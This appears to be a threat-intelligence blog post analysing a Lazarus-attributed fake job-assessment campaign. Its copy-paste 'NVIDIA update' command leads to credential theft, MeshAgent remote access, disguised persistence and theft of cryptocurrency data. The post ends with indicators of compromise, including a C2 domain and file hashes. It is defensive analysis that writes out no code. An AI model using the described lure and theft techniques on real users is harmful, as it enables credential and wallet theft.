Blog

HomeNewsInsightsPeople & Impact
Research

Lazarus’ latest tactics: Deceptive development and ClickFix

We traced a deceptive hiring assessment scam back to Lazarus, and here’s how they use psychology and obfuscation to bypass defenses
Alexandru-Cristian Bardaș
Threat Analysis Engineer
Published
July 22, 2025
Read time
4 Minutes
Lazarus’ latest tactics: Deceptive development and ClickFix
Written by
Alexandru-Cristian Bardaș
Threat Analysis Engineer
Published
July 22, 2025
Read time
4 Minutes
Lazarus’ latest tactics: Deceptive development and ClickFix
    Share this article

    While conducting routine clipboard monitoring, our team uncovered a sophisticated attack chain masquerading as an official NVIDIA-related update. What initially appeared to be a hiring assessment challenge quickly revealed itself to be a cleverly disguised lure. 

    The deceptive journey 

    The attack begins with a prompt to complete a mock interview form, followed by a page instructing users to set up their camera. This page falsely claims there are issues with the user's webcam or microphone, adding a layer of urgency and credibility to the ruse.

    A pop-up then urges users to “Request camera access,” which triggers a seemingly legitimate update command using an NVIDIA domain, to help the user fix his issues.

    However, once copied, the command morphs into a malicious payload. 

    The attack chain 

    Executing the command initiates a multi-stage attack: 

    • A malicious archive is downloaded and automatically extracted.
    • The VBS script launches a Python environment embedded within the archive, posing as a legitimate driver update process. It displays verbose output to further trick the user.
    • The Python script itself is heavily obfuscated and aligns with known tactics used by the Lazarus APT group. 

    Upon deobfuscation, the script reveals five major functionalities: 

    1. Credential Theft: WebBrowserPassView is downloaded, decrypted and executed to extract browser-related credentials. Those credentials, together with system information, are exfiltrated to the command-and-control (C2) server.
    2. Credential Theft: MailPassView is downloaded, decrypted and run to harvest email credentials, which are also sent to the C2.
    3. Remote Access: An instance of MeshAgent is silently installed, providing the attackers with persistent remote control over the infected system.
    4. Advanced Data Theft and Remote Access: A PyInstaller EXE enables file and secret extraction via FTP. Persistence is achieved through a scheduled task disguised as ChromeUpdate.exe, placed within the legitimate Chrome directory to avoid suspicion.
    5. Cryptocurrency Targeting: Browser extensions and local folders related to cryptocurrencies are harvested and sent to the C2. 

    Attribution and implications 

    The attack’s complexity and methodology, paired with the initial lure and code similarities throughout the Python scripts, strongly suggest Lazarus’ involvement. This campaign reflects the group’s evolving tactics under the DeceptiveDevelopment umbrella, combining psychological manipulation with technical sophistication to bypass defenses and exploit trust. 

    Indicators of Compromise (IoCs) 

    Assessment URL: hxxps[://]assessdome[.]com/invite/7e462f3c/8002565804 

    C2: metakenproxy[.]com:81 

    Initial VBS script (SHA256): 7013822c0a794712c5fe8f62c126e5992dca4a744882a039040569ae4ec1a868 

    Initial Python script (SHA256): 03ad194456951695eb4d4ceb40d9e52aaadbc9a4f4b8b1d020077115103e5359 

    WebBrowserPassView (SHA256): 36541fad68e79cdedb965b1afcdc45385646611aa72903ddbe9d4d064d7bffb9 

    MailPassView (SHA256): bc7bd27e94e24a301edb3d3e7fad982225ac59430fc476bda4e1459faa1c1647 

    MeshAgent (SHA256): 9757780860ec5637c412a8756f25c56f7d1d89358e447782164ba418def1c64e 

    ChromeUpdate.exe (SHA256): 00bef70cd031a830f2ee1ec4ce750947a9c8838995289ecbb253426cca53d046 

    Alexandru-Cristian Bardaș
    Threat Analysis Engineer
    Follow us for more
    Blog Archive